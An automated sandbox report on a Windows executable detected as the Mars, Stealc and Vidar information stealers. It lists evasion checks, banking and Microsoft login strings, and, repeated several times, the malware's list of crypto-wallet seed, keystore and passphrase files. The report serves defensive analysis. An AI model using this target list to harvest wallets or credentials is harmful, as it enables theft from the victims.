Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00412570
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_004121F0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00411B80

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Code function: 0_2_00401120 GetSystemInfo,ExitProcess,

0_2_00401120

Source: JDGCFBAF.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: JDGCFBAF.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: JDGCFBAF.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: JDGCFBAF.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: JDGCFBAF.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: JDGCFBAF.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: JDGCFBAF.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: JDGCFBAF.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: JDGCFBAF.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: JDGCFBAF.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: JDGCFBAF.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: JDGCFBAF.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: JDGCFBAF.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: JDGCFBAF.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: JDGCFBAF.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: JDGCFBAF.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: JDGCFBAF.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: JDGCFBAF.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: JDGCFBAF.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: JDGCFBAF.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: JDGCFBAF.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: JDGCFBAF.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: JDGCFBAF.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: JDGCFBAF.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: JDGCFBAF.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: JDGCFBAF.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: JDGCFBAF.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: c4RAHq3BNl.exe, 00000000.00000002.3253231068.0000000002D60000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: JDGCFBAF.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: JDGCFBAF.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002D76000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: JDGCFBAF.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: JDGCFBAF.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	API call chain: ExitProcess graph end node	graph_0-83981
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	API call chain: ExitProcess graph end node	graph_0-85026
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	API call chain: ExitProcess graph end node	graph_0-83978
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	API call chain: ExitProcess graph end node	graph_0-83999
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	API call chain: ExitProcess graph end node	graph_0-83992
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	API call chain: ExitProcess graph end node	graph_0-84031
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	API call chain: ExitProcess graph end node	graph_0-84007

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Code function: 0_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00417B4E

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

0_2_00416240

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Code function: 0_2_00415DC0 mov eax, dword ptr fs:[00000030h]

0_2_00415DC0

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00404C70

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_00419DC7 SetUnhandledExceptionFilter,	0_2_00419DC7
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00417B4E
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004173DD
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C6FB66C
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C6FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C6FB1F7
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C8AAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C8AAC62

HIPS / PFW / Operating System Protection Evasion

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Code function: 0_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00415D00

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Code function: 0_2_6C6FB341 cpuid

0_2_6C6FB341

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00414570

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Code function: 0_2_00414450 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

0_2_00414450

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Code function: 0_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_004143C0

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Code function: 0_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_004144B0

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: 0.2.c4RAHq3BNl.exe.2c80e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.c4RAHq3BNl.exe.2cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.c4RAHq3BNl.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.c4RAHq3BNl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.c4RAHq3BNl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.c4RAHq3BNl.exe.2c80e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3252916519.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2826944612.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.3253248628.0000000002D76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: c4RAHq3BNl.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.c4RAHq3BNl.exe.2c80e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.c4RAHq3BNl.exe.2cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.c4RAHq3BNl.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.c4RAHq3BNl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.c4RAHq3BNl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.c4RAHq3BNl.exe.2c80e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3252916519.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2826944612.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: c4RAHq3BNl.exe PID: 6488, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local 